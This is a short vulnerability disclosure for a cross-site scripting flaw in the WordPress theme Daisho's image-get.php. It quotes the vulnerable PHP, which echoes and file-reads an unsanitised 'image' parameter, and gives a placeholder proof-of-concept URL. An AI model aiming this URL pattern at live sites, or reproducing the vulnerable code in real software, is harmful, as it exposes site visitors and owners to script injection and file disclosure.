facebook facebook twitter rss

WordPress Theme Daisho Cross Site Scripting Vulnerability

Author: Pro_Mast3r , Published: 05-11-2014
#[~]  Type Exploit : Cross Site Scripting Vulnerability
#[~] Vendor : Theme Daisho
#[~] Site Vendor : http://devatic.com/
#[~] Author : ProMast3r
#[~] Mail : Pro.Mast3r@hotmail.com
--------------------------------------------------------
#[~] file Vulnerability : image-get.php
#[~] source File :
$value = $_GET['image'];
$mimes = get_allowed_mime_types();
$file_ext = explode('.',$value);
foreach($mimes as $type => $mime){
if(strpos($type, end($file_ext)) !== false){
if(fileExists($value)){
$contents = file_get_contents($value);
header('Content-type: '.$mime);
echo $contents;
break;
}
}
}
}else{
echo $_GET['image'];
--------------------------------------------------------
#[~]Poc : http://127.0.0.1/wordpress/wp-content/themes/Daisho/admin/image-get.php?image=XSS

#End
#exploit4arab
#IRAQCyberArmy

Like us on Facebook :